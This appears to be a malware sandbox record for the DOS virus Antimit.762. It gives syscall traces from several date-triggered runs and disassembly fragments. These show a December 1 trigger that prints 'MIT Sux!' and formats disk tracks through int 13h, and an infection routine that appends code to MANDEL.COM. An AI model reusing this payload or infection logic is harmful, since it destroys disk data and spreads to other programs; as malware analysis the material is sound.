Sample viewer

vx.netlux.org/Virus.DOS.Antimit.762

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:43:34.858543689Z 42 PC: 12a94 | Get date 0x12a94: cmp dh, 0xc
0x12a97: jne 0x12abf
0x12a99: cmp dl, 1
0x12a9c: jne 0x12abf
0x12a9e: mov dx, 0x127
0x12aa1: mov ah, 9
0x12aa3: int 0x21
0x12aa5: mov ah, 5
0x12aa7: mov al, 2
0x12aa9: mov ch, 0
0x12aab: mov dh, 0
0x12aad: mov dl, 0x80
0x12aaf: int 0x13
0x12ab1: mov ah, 6
0x12ab3: int 0x13
0x12ab5: mov ah, 5
0x12ab7: mov dl, 0
0x12ab9: int 0x13
0x12abb: mov ah, 0x4c
0x12abd: int 0x21
2018-12-17T22:43:34.861049316Z 53 PC: 12ad1 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:43:34.863721274Z 37 PC: 12ae2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:43:34.865410827Z 26 PC: 12aef | Set disk transfer address
2018-12-17T22:43:34.867016844Z 78 PC: 12af9 | Find first file
2018-12-17T22:43:34.874783351Z 79 PC: 12b1e | Find next file
2018-12-17T22:43:34.877971629Z 79 PC: 12b1e | Find next file
2018-12-17T22:43:34.880990268Z 79 PC: 12b1e | Find next file
2018-12-17T22:43:34.884594317Z 79 PC: 12b1e | Find next file
2018-12-17T22:43:34.887660947Z 79 PC: 12b1e | Find next file
2018-12-17T22:43:34.890404379Z 67 PC: 12b44 | Get or set file attributes
2018-12-17T22:43:34.897084135Z 67 PC: 12b4e | Get or set file attributes
2018-12-17T22:43:34.914410697Z 61 PC: 12b53 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:43:34.92202598Z 87 PC: 12b5c | Get or set file date and time
2018-12-17T22:43:34.924849944Z 63 PC: 12b6e | Read file or device (Read 473 bytes on handle 5)
2018-12-17T22:43:34.932144764Z 66 PC: 12b7f | Move file pointer
2018-12-17T22:43:34.933741613Z 64 PC: 12b90 | Write file or device (Write 289 bytes on handle 5)
2018-12-17T22:43:34.943269158Z 64 PC: 12ba1 | Write file or device (Write 473 bytes on handle 5)
2018-12-17T22:43:34.952645479Z 66 PC: 12bb2 | Move file pointer
2018-12-17T22:43:34.954239032Z 44 PC: 12bb8 | Get time 0x12bb8: mov byte ptr [0x105], dh
0x12bbc: call 0x22a46
0x12bbf: mov ah, 0x40
0x12bc1: mov dx, 0x100
0x12bc4: mov cx, 0x1d9
0x12bc7: int 0x21
0x12bc9: jb 0x12c0c
0x12bcb: cmp ax, 0x1d9
0x12bce: jne 0x12c0c
0x12bd0: jmp 0x12bdd
0x12bd2: mov al, 0
0x12bd4: iret
0x12bd5: sub byte ptr [di + 0x4d88], cl
0x12bd9: push bp
0x12bda: add word ptr [bx + 0x11], dx
0x12bdd: mov ax, 0x5701
0x12be0: mov cx, word ptr [0x295]
0x12be4: mov dx, word ptr [0x297]
0x12be8: and cl, 0xe0
0x12beb: or cl, 0x1f
2018-12-17T22:43:34.956747453Z 25 PC: 12a59 | Get default drive
2018-12-17T22:43:34.958544307Z 14 PC: 12a5f | Set default drive (Drive = '‡')
2018-12-17T22:43:34.959987117Z 64 PC: 12bc9 | Write file or device (Write 473 bytes on handle 5)
2018-12-17T22:43:34.966968479Z 87 PC: 12bf0 | Get or set file date and time
2018-12-17T22:43:34.969241328Z 62 PC: 12bf4 | Close file
2018-12-17T22:43:34.977315393Z 26 PC: 12bfb | Set disk transfer address
2018-12-17T22:43:34.978517831Z 37 PC: 12c0b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7928,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:57.065665212Z 42 PC: 12a94 | Get date 0x12a94: cmp dh, 0xc
0x12a97: jne 0x12abf
0x12a99: cmp dl, 1
0x12a9c: jne 0x12abf
0x12a9e: mov dx, 0x127
0x12aa1: mov ah, 9
0x12aa3: int 0x21
0x12aa5: mov ah, 5
0x12aa7: mov al, 2
0x12aa9: mov ch, 0
0x12aab: mov dh, 0
0x12aad: mov dl, 0x80
0x12aaf: int 0x13
0x12ab1: mov ah, 6
0x12ab3: int 0x13
0x12ab5: mov ah, 5
0x12ab7: mov dl, 0
0x12ab9: int 0x13
0x12abb: mov ah, 0x4c
0x12abd: int 0x21
2018-12-25T12:02:57.0685132Z 9 PC: 12aa5 | Display string (String= 'MIT Sux! ')
2018-12-25T12:02:57.074851514Z 76 PC: 12abf | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":2,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7928,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:57.073061445Z 42 PC: 12a94 | Get date 0x12a94: cmp dh, 0xc
0x12a97: jne 0x12abf
0x12a99: cmp dl, 1
0x12a9c: jne 0x12abf
0x12a9e: mov dx, 0x127
0x12aa1: mov ah, 9
0x12aa3: int 0x21
0x12aa5: mov ah, 5
0x12aa7: mov al, 2
0x12aa9: mov ch, 0
0x12aab: mov dh, 0
0x12aad: mov dl, 0x80
0x12aaf: int 0x13
0x12ab1: mov ah, 6
0x12ab3: int 0x13
0x12ab5: mov ah, 5
0x12ab7: mov dl, 0
0x12ab9: int 0x13
0x12abb: mov ah, 0x4c
0x12abd: int 0x21
2018-12-25T12:02:57.07616879Z 53 PC: 12ad1 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:02:57.077660341Z 37 PC: 12ae2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:02:57.079141712Z 26 PC: 12aef | Set disk transfer address
2018-12-25T12:02:57.081045178Z 78 PC: 12af9 | Find first file
2018-12-25T12:02:57.087333191Z 79 PC: 12b1e | Find next file
2018-12-25T12:02:57.090150628Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:02:57.093223971Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:02:57.096237825Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:02:57.098978794Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:02:57.101669156Z 67 PC: 12b44 | Get or set file attributes
2018-12-25T12:02:57.108413239Z 67 PC: 12b4e | Get or set file attributes
2018-12-25T12:02:57.12820269Z 61 PC: 12b53 | Open file (Filename = 'MANDEL.COM')
2018-12-25T12:02:57.137324772Z 87 PC: 12b5c | Get or set file date and time
2018-12-25T12:02:57.140053949Z 63 PC: 12b6e | Read file or device (Read 473 bytes on handle 5)
2018-12-25T12:02:57.146616252Z 66 PC: 12b7f | Move file pointer
2018-12-25T12:02:57.148090748Z 64 PC: 12b90 | Write file or device (Write 289 bytes on handle 5)
2018-12-25T12:02:57.160694287Z 64 PC: 12ba1 | Write file or device (Write 473 bytes on handle 5)
2018-12-25T12:02:57.168749312Z 66 PC: 12bb2 | Move file pointer
2018-12-25T12:02:57.170422157Z 44 PC: 12bb8 | Get time 0x12bb8: mov byte ptr [0x105], dh
0x12bbc: call 0x22a46
0x12bbf: mov ah, 0x40
0x12bc1: mov dx, 0x100
0x12bc4: mov cx, 0x1d9
0x12bc7: int 0x21
0x12bc9: jb 0x12c0c
0x12bcb: cmp ax, 0x1d9
0x12bce: jne 0x12c0c
0x12bd0: jmp 0x12bdd
0x12bd2: mov al, 0
0x12bd4: iret
0x12bd5: sub byte ptr [di + 0x4d88], cl
0x12bd9: push bp
0x12bda: add word ptr [bx + 0x11], dx
0x12bdd: mov ax, 0x5701
0x12be0: mov cx, word ptr [0x295]
0x12be4: mov dx, word ptr [0x297]
0x12be8: and cl, 0xe0
0x12beb: or cl, 0x1f
2018-12-25T12:02:57.173739204Z 25 PC: 12a59 | Get default drive
2018-12-25T12:02:57.174868421Z 14 PC: 12a5f | Set default drive (Drive = '')
2018-12-25T12:02:57.176168389Z 64 PC: 12bc9 | Write file or device (Write 473 bytes on handle 5)
2018-12-25T12:02:57.182488086Z 87 PC: 12bf0 | Get or set file date and time
2018-12-25T12:02:57.183990402Z 62 PC: 12bf4 | Close file
2018-12-25T12:02:57.189218559Z 26 PC: 12bfb | Set disk transfer address
2018-12-25T12:02:57.190057123Z 37 PC: 12c0b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7928,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:57.577264304Z 42 PC: 12a94 | Get date 0x12a94: cmp dh, 0xc
0x12a97: jne 0x12abf
0x12a99: cmp dl, 1
0x12a9c: jne 0x12abf
0x12a9e: mov dx, 0x127
0x12aa1: mov ah, 9
0x12aa3: int 0x21
0x12aa5: mov ah, 5
0x12aa7: mov al, 2
0x12aa9: mov ch, 0
0x12aab: mov dh, 0
0x12aad: mov dl, 0x80
0x12aaf: int 0x13
0x12ab1: mov ah, 6
0x12ab3: int 0x13
0x12ab5: mov ah, 5
0x12ab7: mov dl, 0
0x12ab9: int 0x13
0x12abb: mov ah, 0x4c
0x12abd: int 0x21
2018-12-25T12:02:57.580245462Z 53 PC: 12ad1 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:02:57.58248203Z 37 PC: 12ae2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:02:57.583656884Z 26 PC: 12aef | Set disk transfer address
2018-12-25T12:02:57.584800563Z 78 PC: 12af9 | Find first file
2018-12-25T12:02:57.592011874Z 79 PC: 12b1e | Find next file
2018-12-25T12:02:57.595218891Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:02:57.598476763Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:02:57.602733356Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:02:57.605891333Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:02:57.60901566Z 67 PC: 12b44 | Get or set file attributes
2018-12-25T12:02:57.616024854Z 67 PC: 12b4e | Get or set file attributes
2018-12-25T12:02:57.633772639Z 61 PC: 12b53 | Open file (Filename = 'MANDEL.COM')
2018-12-25T12:02:57.641950502Z 87 PC: 12b5c | Get or set file date and time
2018-12-25T12:02:57.643740256Z 63 PC: 12b6e | Read file or device (Read 473 bytes on handle 5)
2018-12-25T12:02:57.65109162Z 66 PC: 12b7f | Move file pointer
2018-12-25T12:02:57.653048935Z 64 PC: 12b90 | Write file or device (Write 289 bytes on handle 5)
2018-12-25T12:02:57.662176186Z 64 PC: 12ba1 | Write file or device (Write 473 bytes on handle 5)
2018-12-25T12:02:57.675213764Z 66 PC: 12bb2 | Move file pointer
2018-12-25T12:02:57.677103085Z 44 PC: 12bb8 | Get time 0x12bb8: mov byte ptr [0x105], dh
0x12bbc: call 0x22a46
0x12bbf: mov ah, 0x40
0x12bc1: mov dx, 0x100
0x12bc4: mov cx, 0x1d9
0x12bc7: int 0x21
0x12bc9: jb 0x12c0c
0x12bcb: cmp ax, 0x1d9
0x12bce: jne 0x12c0c
0x12bd0: jmp 0x12bdd
0x12bd2: mov al, 0
0x12bd4: iret
0x12bd5: sub byte ptr [di + 0x4d88], cl
0x12bd9: push bp
0x12bda: add word ptr [bx + 0x11], dx
0x12bdd: mov ax, 0x5701
0x12be0: mov cx, word ptr [0x295]
0x12be4: mov dx, word ptr [0x297]
0x12be8: and cl, 0xe0
0x12beb: or cl, 0x1f
2018-12-25T12:02:57.6800021Z 25 PC: 12a59 | Get default drive
2018-12-25T12:02:57.696340004Z 14 PC: 12a5f | Set default drive (Drive = '')
2018-12-25T12:02:57.697656423Z 64 PC: 12bc9 | Write file or device (Write 473 bytes on handle 5)
2018-12-25T12:02:57.705355572Z 87 PC: 12bf0 | Get or set file date and time
2018-12-25T12:02:57.707916544Z 62 PC: 12bf4 | Close file
2018-12-25T12:02:57.716684862Z 26 PC: 12bfb | Set disk transfer address
2018-12-25T12:02:57.717931912Z 37 PC: 12c0b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')